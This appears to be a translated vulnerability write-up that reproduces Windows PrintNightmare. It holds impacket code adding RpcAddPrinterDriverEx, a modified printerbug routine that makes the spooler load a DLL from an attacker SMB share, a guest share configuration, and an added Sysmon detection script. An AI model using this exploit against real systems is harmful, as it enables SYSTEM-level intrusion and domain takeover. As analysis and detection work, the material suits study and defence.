[Original] Windows PrintNightmare: Reproduction and Analysis
Posted: 2022-1-21 11:13 (29242 views)
Windows Print Spooler is the print spooling service: it manages every local and network print queue and controls all print jobs. The service contains a privilege escalation vulnerability: an authenticated attacker can make the Spooler service load a malicious DLL and thereby run code with the service's privileges. Exploitation needs valid credentials, but an attacker can obtain those in many ways, and in a domain environment a remote attacker holding nothing more than an ordinary domain account (no administrative rights) can use the bug to execute arbitrary code as SYSTEM on a domain controller and take over the whole domain.
Although Microsoft assigned PrintNightmare its own identifier, CVE-2021-34527, the author still regards it as the remote-code-execution exploitation that follows from CVE-2021-1675. Start with the patch diff. The most visible change is in RpcAddPrinterDriverEx: before calling YAddPrinterDriverEx it now performs a check and, when a certain condition is met, ANDs dwFileCopyFlags with 0xFFFF7FFF. The purpose of that operation is to clear the 0x8000 bit in dwFileCopyFlags.
The documentation says 0x00008000 is APD_INSTALL_WARNED_DRIVER: add the printer driver even if it is on the server's list of warned printer drivers. The next step is therefore to build a request that makes the spooler service execute RpcAddPrinterDriverEx.
First, check whether an older PoC exists that can be reused with small changes. printerbug.py turned up quickly: it is built on impacket and calls RpcOpenPrinter. However, the impacket build used here (0.9.24.dev1; newer releases have since added it) does not implement RpcAddPrinterDriverEx, so, following the format of impacket.dcerpc.v5.rprn, I added classes for RpcAddPrinterDriverEx, shown in the first listing below:
The type of the second parameter of RpcAddPrinterDriverEx, DRIVER_CONTAINER, is somewhat involved, but by following the format of the other structures its definition is quickly written (second listing below):
Next, modify printerbug.py, mainly the lookup function of the PrinterBug class (one pitfall: every LPWSTR string has to end with \x00, otherwise the server answers with rpc_x_bad_stub_data; I was stuck on that for a while). The modified function is in the third listing below:
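The terminator pitfall is worth seeing in bytes. The block below is an added illustration written for this write-up, not code from the post or from impacket: `ndr_wstr_referent` marshals a Python string the way impacket's WSTR (the type behind LPWSTR/STRING_HANDLE) does, which never appends a NUL, and `server_unmarshal_string` is a deliberately simplified model (an assumption, not the real MIDL stub) of the one check that matters here: a [string] wchar_t* whose last code unit is not NUL is rejected as bad stub data.

```python
import struct

# Constructed example: impacket's WSTR marshals a str as an NDR
# conformant-varying UTF-16LE array and does NOT add a terminator, so a
# [string] wchar_t* only carries its NUL if the Python string contains it.

def wstr(s):
    """Return s with exactly one trailing NUL, which is what the PoC needs
    for pName, pEnvironment, pDriverPath, pDataFile and pConfigFile."""
    return s if s.endswith("\x00") else s + "\x00"

def ndr_wstr_referent(s):
    """Marshal the referent of a [string, unique] wchar_t* the way impacket's
    WSTR does: MaximumCount, Offset, ActualCount (all counted in wchar_t),
    then the UTF-16LE code units, padded to a 4-byte boundary."""
    data = s.encode("utf-16-le")
    count = len(data) // 2
    body = struct.pack("<III", count, 0, count) + data
    return body + b"\x00" * ((-len(body)) % 4)

def server_unmarshal_string(buf):
    """Simplified model (assumption) of the server stub's handling of a
    [string] wchar_t* referent. Returns the decoded string without its
    terminator, or raises ValueError carrying the status the post reports."""
    if len(buf) < 12:
        raise ValueError("rpc_x_bad_stub_data")
    max_count, offset, actual = struct.unpack_from("<III", buf, 0)
    chars = buf[12:12 + actual * 2]
    if offset != 0 or actual > max_count or actual == 0 or len(chars) != actual * 2:
        raise ValueError("rpc_x_bad_stub_data")
    if chars[-2:] != b"\x00\x00":          # last code unit must be NUL
        raise ValueError("rpc_x_bad_stub_data")
    return chars[:-2].decode("utf-16-le")

def round_trip(s):
    """Marshal s as the PoC would and push it through the model stub."""
    return server_unmarshal_string(ndr_wstr_referent(s))

if __name__ == "__main__":
    for candidate in ("Test printer", wstr("Test printer")):
        try:
            print(repr(candidate), "->", repr(round_trip(candidate)))
        except ValueError as e:
            print(repr(candidate), "->", e)
```

Running it shows "Test printer" rejected and "Test printer\x00" accepted; wrapping every string assignment in the PoC with `wstr()` is a cheaper fix than remembering the suffix on each line.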
Before testing, the machine that hosts the share also has to be configured to allow anonymous access; otherwise the call fails with the ERROR_FILE_NOT_FOUND shown in the terminal output at the end of the post:
On a Windows machine it can be configured as follows:
If the attacking machine is Linux, set up an SMB server instead: edit /etc/samba/smb.conf and then run sudo service smbd start:
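The smb.conf the post edits is only shown as a screenshot. The following is an added, minimal standalone-server configuration (not the author's file) that exposes a guest-readable share named smb, so that the \\<attacker>\smb\asd.dll path used by the PoC resolves; the share name, the directory /srv/smb and the guest account are assumptions.

```ini
[global]
   workgroup = WORKGROUP
   server role = standalone server
   ; treat unknown users as guest instead of failing the session setup
   map to guest = Bad User
   guest account = nobody
   log file = /var/log/samba/%m.log

[smb]
   comment = payload share for the PoC
   path = /srv/smb
   guest ok = yes
   read only = yes
   browseable = yes
   force user = nobody
```

Check the file with testparm, put asd.dll under /srv/smb with world-readable permissions, and start smbd as the post does. One caveat outside the post's lab: newer Windows SMB clients (Windows 10 Enterprise/Education 1709 and later, Windows Server 2019 and later) refuse guest logons by default, so on such a target the spooler will not fetch from a guest-only share whatever this configuration says.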
Good analyses of the vulnerability already exist, for example https://www.freebuf.com/vuls/282023.html.
So I will not repeat them here and only note the points I wanted to understand myself.
Microsoft's documentation describes pName as follows:
This parameter is a pointer to a string that specifies the name of the print server the method operates on. It must be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4 (IPv4), Internet Protocol version 6 (IPv6) or Universal Naming Convention (UNC) name to which the remote procedure call (RPC) is bound, and it must uniquely identify the print server on the network.
The parameter is checked by FindSpoolerByNameIncRef: if the check passes, pLocalIniSpooler is returned; if it fails, SplAddPrinterDriverEx is never executed.
Along the way the chain FindSpoolerByNameIncRef -> FindSpoolerByName -> FindSpooler -> CheckMyName -> CacheIsNameInNodeList -> TNameResolutionCache::IsNameInNodeCache -> TResolutionCacheNode::IsNameInNodeCache may run until a pName matches, as shown below:
The following code shows that pName may be NULL: in FindSpoolerByName, a pName that does not start with "\\" is treated as LocalIniSpooler. SplAddPrinterDriverEx still calls MyName->CheckMyName, and that also returns 1 for a NULL pName, so the check passes. The Python PoC uses NULL for pName; "\\" works as well, which you can confirm in a debugger.
Continuing into localspl!SplAddPrinterDriverEx: once the MyName check passes, the code below runs. It tests whether bit 15 (counting from 0) of dwFileCopyFlags is set. If it is (we set dwFileCopyFlags to 0x8014), the statement v11 = 1 is skipped, so when `if ( v11 && !(unsigned int)ValidateObjectAccess(0, 1, 0i64, 0i64, (__int64)pLocalIniSpooler, 0) )` is evaluated v11 is still 0, the ValidateObjectAccess check is bypassed and execution reaches InternalAddPrinterDriverEx. After InternalAddPrinterDriverEx completes, the Spooler service loads the DriverFile and ConfigFile modules that were specified, as shown below:
With the analysis so far we already have a way to make the Spooler service load a DLL of our choice; it is still worth testing whether it will load a file from the network, since that widens the impact (local becomes remote). Setting pConfigFile directly to a UNC (network) path fails: when InternalAddPrinterDriverEx calls ValidateDriverInfo, the check below requires pDriverPath and pConfigFile to be local files whenever dwFileCopyFlags has 0x10 (APD_COPY_FROM_DIRECTORY) set; otherwise the call fails with error 0x57 (ERROR_INVALID_PARAMETER).
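To tie the three checks together (the pName check, the bit-15 bypass of ValidateObjectAccess, and the UNC rejection under 0x10), here is an added model of those decision points written for this write-up. It is an illustration, not Microsoft's code and not the decompilation: the APD_* and Win32 error values are the documented ones, the condition under which the patch strips 0x8000 is modelled as "caller is not an administrator" (an assumption; the post only says "a certain condition"), and the error returned when the name check fails is likewise assumed (ERROR_INVALID_PRINTER_NAME), since the post only states that the call does not proceed.

```python
# Constructed model of the checks the post traces through
# spoolsv!RpcAddPrinterDriverEx -> localspl!SplAddPrinterDriverEx ->
# InternalAddPrinterDriverEx -> ValidateDriverInfo. Illustrative only.

APD_STRICT_UPGRADE        = 0x00000001
APD_STRICT_DOWNGRADE      = 0x00000002
APD_COPY_ALL_FILES        = 0x00000004
APD_COPY_NEW_FILES        = 0x00000008
APD_COPY_FROM_DIRECTORY   = 0x00000010
APD_INSTALL_WARNED_DRIVER = 0x00008000   # bit 15, the one the patch strips

ERROR_SUCCESS              = 0x0
ERROR_ACCESS_DENIED        = 0x5
ERROR_INVALID_PARAMETER    = 0x57        # the 0x57 the post sees for a UNC pConfigFile
ERROR_INVALID_PRINTER_NAME = 0x709       # assumed for a pName that is not this server

# what the PoC sends: 0x4 | 0x10 | 0x8000
POC_FLAGS = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER

def is_unc(path):
    return path is not None and path.startswith("\\\\")

class SpoolerModel:
    def __init__(self, my_names, caller_is_admin, patched):
        self.my_names = {n.lower() for n in my_names}
        self.caller_is_admin = caller_is_admin
        self.patched = patched
        self.loaded = []                  # modules the service would load

    def check_my_name(self, pName):
        """FindSpoolerByName / CheckMyName as the post describes them: NULL or
        anything not starting with '\\\\' means the local spooler; a bare
        '\\\\' is accepted (the post observed this in the debugger); '\\\\host'
        must name this server."""
        if pName is None or not pName.startswith("\\\\"):
            return True
        host = pName[2:].rstrip("\x00")
        return host == "" or host.lower() in self.my_names

    def add_printer_driver_ex(self, pName, driver_path, config_file, flags):
        # spoolsv!RpcAddPrinterDriverEx after the patch: dwFileCopyFlags &= 0xFFFF7FFF
        # for callers that fail its new condition (modelled here as non-admin).
        if self.patched and not self.caller_is_admin:
            flags &= 0xFFFF7FFF
        if not self.check_my_name(pName):
            return ERROR_INVALID_PRINTER_NAME
        # localspl!SplAddPrinterDriverEx: v11 = 1 only when bit 15 is clear,
        # and ValidateObjectAccess runs only when v11 is set.
        v11 = 0 if flags & APD_INSTALL_WARNED_DRIVER else 1
        if v11 and not self.caller_is_admin:          # ValidateObjectAccess fails
            return ERROR_ACCESS_DENIED
        # InternalAddPrinterDriverEx -> ValidateDriverInfo: with 0x10 set,
        # pDriverPath and pConfigFile must both be local files.
        if flags & APD_COPY_FROM_DIRECTORY and (is_unc(driver_path) or is_unc(config_file)):
            return ERROR_INVALID_PARAMETER
        self.loaded += [driver_path, config_file]     # the service loads both
        return ERROR_SUCCESS

if __name__ == "__main__":
    target = SpoolerModel(["WIN-DC"], caller_is_admin=False, patched=False)
    local_dll = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1\\asd.dll"
    print(hex(target.add_printer_driver_ex(None, "C:\\drv\\UNIDRV.DLL", local_dll, POC_FLAGS)))
    print(hex(target.add_printer_driver_ex(None, "C:\\drv\\UNIDRV.DLL", "\\\\10.0.0.1\\smb\\asd.dll", POC_FLAGS)))
```

The same request that succeeds on the unpatched model (0x0) returns 0x57 as soon as pConfigFile is a UNC path, and returns ERROR_ACCESS_DENIED on the patched model because the stripped flags re-enable the ValidateObjectAccess path.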
The debugger output below shows this flow more directly:
Now for the file operations. With Process Monitor we can see that the service first creates the Old and New folders under C:\Windows\System32\spool\drivers\x64\3.
The driver file is copied into C:\Windows\System32\spool\drivers\x64\3\New\, and pConfigFile and pDataFile are copied there in the same way.
When RpcAddPrinterDriverEx is called repeatedly, the service does the following on each call:
1. Copy the new files into C:\Windows\System32\spool\drivers\x64\3\New\.
2. Move the existing files under C:\Windows\System32\spool\drivers\x64\3 to C:\Windows\System32\spool\drivers\x64\3\Old\1 (or 2, 3, ... on later calls), then move the files from C:\Windows\System32\spool\drivers\x64\3\New\ into C:\Windows\System32\spool\drivers\x64\3.
3. Load pDriverPath and pConfigFile from C:\Windows\System32\spool\drivers\x64\3.
So in a later request we set pConfigFile to C:\Windows\System32\spool\drivers\x64\3\Old\X\asd.dll, as shown below: the Spooler service loads the malicious DLL and we get a reverse shell.
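The New/Old directory rotation described above is also the most useful artefact for defenders. The block below is an added detection example written for this write-up (not part of the post) that runs over constructed Sysmon-style events: file creation (Event ID 11) by spoolsv.exe into drivers\x64\3\New, and image loads (Event ID 7) by spoolsv.exe from drivers\x64\3\Old\N or of an unsigned DLL from the driver directory. The key=value line format and the sample events are made up for the example.

```python
import re

# Constructed Sysmon-style events (EventID 11 = FileCreate, 7 = ImageLoad),
# written for this example; they are not logs from the post's lab.
SAMPLE_EVENTS = [
    "EventID=11 Image=C:\\Windows\\System32\\spoolsv.exe TargetFilename=C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\asd.dll",
    "EventID=11 Image=C:\\Windows\\System32\\spoolsv.exe TargetFilename=C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\winhttp.dll",
    "EventID=7 Image=C:\\Windows\\System32\\spoolsv.exe ImageLoaded=C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1\\asd.dll Signed=false",
    "EventID=7 Image=C:\\Windows\\System32\\spoolsv.exe ImageLoaded=C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UNIDRV.DLL Signed=true",
    "EventID=11 Image=C:\\Windows\\explorer.exe TargetFilename=C:\\Users\\bob\\Downloads\\asd.dll",
]

# The three locations the post shows the service writing to and loading from.
DRIVER_DIR = re.compile(r"\\spool\\drivers\\x64\\3\\", re.I)
NEW_DIR    = re.compile(r"\\spool\\drivers\\x64\\3\\New\\", re.I)
OLD_DIR    = re.compile(r"\\spool\\drivers\\x64\\3\\Old\\\d+\\", re.I)

def parse_event(line):
    """Split 'k=v k=v ...' into a dict (values in these samples contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())

def classify(ev):
    """Return (severity, reason, path) for an event worth alerting on, else None."""
    if not ev.get("Image", "").lower().endswith("\\spoolsv.exe"):
        return None
    if ev.get("EventID") == "7":
        path = ev.get("ImageLoaded", "")
        if OLD_DIR.search(path):
            return ("high", "spoolsv loaded a DLL from drivers\\x64\\3\\Old\\N (the rotation trick from the post)", path)
        if DRIVER_DIR.search(path) and ev.get("Signed", "").lower() != "true":
            return ("high", "spoolsv loaded an unsigned DLL from the driver directory", path)
    elif ev.get("EventID") == "11":
        path = ev.get("TargetFilename", "")
        if NEW_DIR.search(path) and path.lower().endswith(".dll"):
            return ("medium", "driver DLL staged in drivers\\x64\\3\\New (legitimate installs do this too)", path)
    return None

def scan(lines):
    """Run every line through the classifier and keep the alerts."""
    return [alert for alert in (classify(parse_event(line)) for line in lines) if alert]

if __name__ == "__main__":
    for severity, reason, path in scan(SAMPLE_EVENTS):
        print(severity.upper(), reason, path, sep=" | ")
```

The staging events alone are low fidelity, since any genuine driver installation writes to New and rotates into Old; the load of a DLL from Old\N by spoolsv.exe is the signal that matches the exploitation path in the post, and correlating it with the network logon that preceded the RPC call gives the attacker's source.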
References:
- https://github.com/numanturle/PrintNightmare
- https://www.freebuf.com/vuls/282023.html
- https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ
- https://mp.weixin.qq.com/s/8j4ylHr8ZDhlrWMAwhVcmQ
Listing 1: RpcAddPrinterDriverEx added to impacket/dcerpc/v5/rprn.py

```python
# Added to impacket/dcerpc/v5/rprn.py in the style of the existing calls there
# (the 0.9.24.dev1 build used in this post had no RpcAddPrinterDriverEx).

# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
    opnum = 89
    structure = (
        ('pName', STRING_HANDLE),
        ('pDriverContainer', DRIVER_CONTAINER),
        ('dwFileCopyFlags', DWORD),
    )

class RpcAddPrinterDriverExResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

def hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level=2):
    request = RpcAddPrinterDriverEx()
    request['pName'] = pName
    request['pDriverContainer'] = DriverContainer
    request['dwFileCopyFlags'] = flags
    # return the response so the caller can inspect ErrorCode (the original
    # listing dropped it, leaving resp as None)
    return dce.request(request)

################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
    0   : (RpcEnumPrinters, RpcEnumPrintersResponse),
    1   : (RpcOpenPrinter, RpcOpenPrinterResponse),
    10  : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
    29  : (RpcClosePrinter, RpcClosePrinterResponse),
    65  : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
    69  : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
    89  : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}
```
Listing 2: DRIVER_CONTAINER and the DRIVER_INFO structures added to rprn.py (section numbers refer to MS-RPRN)

```python
##################################### MY ADD ######################################
# Structures needed to marshal DRIVER_CONTAINER (MS-RPRN 2.2.1.2.3). Only the
# level-2 member is used by the PoC; the rest are defined so the union is complete.

# 2.2.1.5.1 DRIVER_INFO_1 (not used by the PoC)
class DRIVER_INFO_1(NDRSTRUCT):
    structure = (
        ('notUsed', ULONGLONG),
    )

class PDRIVER_INFO_1(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_1),
    )

# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
    )

class PDRIVER_INFO_2(NDRPOINTER):
    referent = (
        ('Data', DRIVER_INFO_2),
    )

# 2.2.1.5.3 RPC_DRIVER_INFO_3
class RPC_DRIVER_INFO_3(NDRSTRUCT):
    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
        ('pHelpFile', LPWSTR),
        ('pMonitorName', LPWSTR),
        ('pDefaultDataType', LPWSTR),
        ('cchDependentFiles', DWORD),
        ('pDependentFiles', LPWSTR),
    )

class PRPC_DRIVER_INFO_3(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_3),
    )

# 2.2.1.5.4 RPC_DRIVER_INFO_4
class RPC_DRIVER_INFO_4(NDRSTRUCT):
    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
        ('pHelpFile', LPWSTR),
        ('pMonitorName', LPWSTR),
        ('pDefaultDataType', LPWSTR),
        ('cchDependentFiles', DWORD),
        ('pDependentFiles', LPWSTR),
        ('cchPreviousNames', DWORD),
        ('pszzPreviousNames', LPWSTR),
    )

class PRPC_DRIVER_INFO_4(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_4),
    )

# 2.2.1.5.5 RPC_DRIVER_INFO_6
class FILETIME(NDRSTRUCT):
    structure = (
        ('dwLowDateTime', DWORD),
        ('dwHighDateTime', DWORD),
    )

class RPC_DRIVER_INFO_6(NDRSTRUCT):
    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
        ('pHelpFile', LPWSTR),
        ('pMonitorName', LPWSTR),
        ('pDefaultDataType', LPWSTR),
        ('cchDependentFiles', DWORD),
        ('pDependentFiles', LPWSTR),
        ('cchPreviousNames', DWORD),
        ('pszzPreviousNames', LPWSTR),
        ('ftDriverDate', FILETIME),
        ('dwlDriverVersion', ULONGLONG),
        ('pMfgName', LPWSTR),
        ('pOEMUrl', LPWSTR),
        ('pHardwareID', LPWSTR),
        ('pProvider', LPWSTR),
    )

class PRPC_DRIVER_INFO_6(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_6),
    )

# 2.2.1.5.6 RPC_DRIVER_INFO_8
class RPC_DRIVER_INFO_8(NDRSTRUCT):
    structure = (
        ('cVersion', DWORD),
        ('pName', LPWSTR),
        ('pEnvironment', LPWSTR),
        ('pDriverPath', LPWSTR),
        ('pDataFile', LPWSTR),
        ('pConfigFile', LPWSTR),
        ('pHelpFile', LPWSTR),
        ('pMonitorName', LPWSTR),
        ('pDefaultDataType', LPWSTR),
        ('cchDependentFiles', DWORD),
        ('pDependentFiles', LPWSTR),
        ('cchPreviousNames', DWORD),
        ('pszzPreviousNames', LPWSTR),
        ('ftDriverDate', FILETIME),
        ('dwlDriverVersion', ULONGLONG),
        ('pMfgName', LPWSTR),
        ('pOEMUrl', LPWSTR),
        ('pHardwareID', LPWSTR),
        ('pProvider', LPWSTR),
        ('pPrintProcessor', LPWSTR),
        ('pVendorSetup', LPWSTR),
        ('cchColorProfiles', DWORD),
        ('pszzColorProfiles', LPWSTR),
        ('pInfPath', LPWSTR),
        ('dwPrinterDriverAttributes', DWORD),
        ('cchCoreDependencies', DWORD),
        # [size_is(cchCoreDependencies)] string per MS-RPRN 2.2.1.5.6;
        # it was missing from the original listing
        ('pszzCoreDependencies', LPWSTR),
        ('ftMinInboxDriverVerDate', FILETIME),
        ('dwlMinInboxDriverVerVersion', ULONGLONG),
    )

class PRPC_DRIVER_INFO_8(NDRPOINTER):
    referent = (
        ('Data', RPC_DRIVER_INFO_8),
    )

# 2.2.1.2.3 DRIVER_CONTAINER
class Driver_Info_UNION(NDRUNION):
    commonHdr = (
        ('tag', ULONG),
    )
    # The union is switched on Level, and MS-RPRN defines cases 1, 2, 3, 4, 6
    # and 8 (the original listing keyed Level6/Level8 under 5 and 6, which
    # would mis-encode those two levels; the PoC only uses level 2).
    union = {
        1 : ('pNotUsed', PDRIVER_INFO_1),
        2 : ('Level2', PDRIVER_INFO_2),
        3 : ('Level3', PRPC_DRIVER_INFO_3),
        4 : ('Level4', PRPC_DRIVER_INFO_4),
        6 : ('Level6', PRPC_DRIVER_INFO_6),
        8 : ('Level8', PRPC_DRIVER_INFO_8),
    }

class DRIVER_CONTAINER(NDRSTRUCT):
    structure = (
        ('Level', DWORD),
        ('DriverInfo', Driver_Info_UNION),
    )
```
Listing 3: the modified part of PrinterBug.lookup in printerbug.py

```python
# Body of the modified lookup(self, rpctransport, host) in the PrinterBug class.
# The RPC bind to \pipe\spoolss that yields `dce` is the unchanged part of the
# method and is not repeated here; `pDriverPath` is the path of a legitimate
# local driver DLL set earlier in the method (its value is not shown in the post).
#def lookup(self, rpctransport, host):
level = 2
Driver_Info_Union = rprn.Driver_Info_UNION()
Driver_Info_Union['tag'] = level
DRIVER_INFO = Driver_Info_Union["Level" + str(level)]
DRIVER_INFO['cVersion'] = 3
# every LPWSTR must carry its NUL terminator, otherwise the server
# answers with rpc_x_bad_stub_data
DRIVER_INFO['pName'] = "Test printer\x00"
DRIVER_INFO['pEnvironment'] = "Windows x64\x00"
DRIVER_INFO['pDriverPath'] = pDriverPath
# pDataFile may be a UNC path: it is fetched from the attacker's share
DRIVER_INFO['pDataFile'] = "\\\\{}\\smb\\asd.dll\x00".format(self.__attackerhost)
# pConfigFile must be a local file when 0x10 (APD_COPY_FROM_DIRECTORY) is set
DRIVER_INFO['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
DriverContainer = rprn.DRIVER_CONTAINER()
DriverContainer['Level'] = level
DriverContainer['DriverInfo'] = Driver_Info_Union
#resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
print("[*] Attempting to call RpcAddPrinterDriverEx")
pName = NULL   # NULL (or "\\") passes the CheckMyName test as the local spooler
# APD_COPY_ALL_FILES (0x4) | APD_COPY_FROM_DIRECTORY (0x10) | APD_INSTALL_WARNED_DRIVER (0x8000) = 0x8014;
# the 0x8000 bit is what skips ValidateObjectAccess in localspl!SplAddPrinterDriverEx
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
resp = rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
```
Terminal output of the first attempt (the share did not yet allow anonymous access):

```
┌──(strawberry㉿kalilili)-[~]
└─$ python testprinter.py strawberry@192.168.140.222 192.168.140.144
[*] Impacket v0.9.24.dev1+20210618.54810.11f43043 - Copyright 2021 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at 192.168.140.222
[*] Bind OK
[*] Attempting to call RpcAddPrinterDriverEx ......
[-] Lookup Error: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
```